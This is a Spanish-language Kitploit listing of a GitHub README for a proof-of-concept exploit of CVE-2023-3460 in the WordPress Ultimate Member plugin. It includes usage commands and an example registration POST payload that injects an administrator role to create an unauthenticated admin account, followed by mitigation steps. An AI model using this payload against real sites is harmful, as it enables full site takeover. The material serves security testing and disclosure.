Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/gurjotexpert/cve-2023-3460
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAprendizaje y Educación
GitHubgurjotexpert/cve-2023-3460

CVE-2023-3460

Ver Repositorio
11hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🚨 CVE-2023-3460 - Exploit de escalada de privilegios en WordPress Ultimate Member

Este es un exploit de prueba de concepto (PoC) para CVE-2023-3460, una vulnerabilidad crítica en el plugin de WordPress Ultimate Member. Permite a usuarios no autenticados escalar sus privilegios a Administrador mediante una solicitud de registro maliciosa.

🔥 Impacto: Compromiso total del sitio mediante la creación no autorizada de cuentas de administrador.


📌 Detalles de la vulnerabilidad

  • Plugin afectado: Ultimate Member
  • Versiones afectadas: ≤ 2.6.6
  • Versión corregida: 2.6.7
  • Tipo de exploit: Escalada de privilegios mediante abuso del registro
  • Autenticación requerida: ❌ No
  • CVE: CVE-2023-3460

⚙️ Requisitos

  • Python 3
  • Librería requests
  • Librería urllib3
  • Librería beautifulsoup4

Instala los requisitos:

root@kitploit:~
pip3 install requests urllib3 beautifulsoup4

🧪 Uso del exploit

root@kitploit:~
python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD> 

✅ Ejemplo:

root@kitploit:~
python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123 

📥 Características del script de exploit

  • Obtiene el nonce CSRF (_wpnonce) de la página de registro
  • Omite la validación del formulario
  • Inyecta wp_capabilities con el rol administrator
  • Crea un nuevo usuario administrador sin autenticación

🔐 Ejemplo de payload del exploit

root@kitploit:~
POST /register/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded

user_login=pwnadmin&
[email protected]&
user_password=Pass@123&
wp_càpabilities[administrator]=1&
_um_nonce=<nonce_value>

🛡️ Mitigación

  • Actualiza el plugin Ultimate Member a v2.6.7 o superior
  • Desactiva el registro abierto si no es necesario
  • Supervisa los registros de creación de usuarios para detectar actividad sospechosa

📚 Referencias

  • 🔗 Aviso de Patchstack
  • 🔗 CVE-2023-3460 en NVD

⚠️ Descargo de responsabilidad

Este script se proporciona solo con fines educativos y de pruebas autorizadas. La explotación no autorizada de sistemas es ilegal y poco ética. Úsalo únicamente en sistemas que poseas o para los que tengas permiso de prueba.


👨‍💻 Autor

  • 💀 [GURJOT SINGH]
  • 🔒 [Linkdin: https://in.linkedin.com/in/gurjot-singh-8198b3220]
Descargar herramienta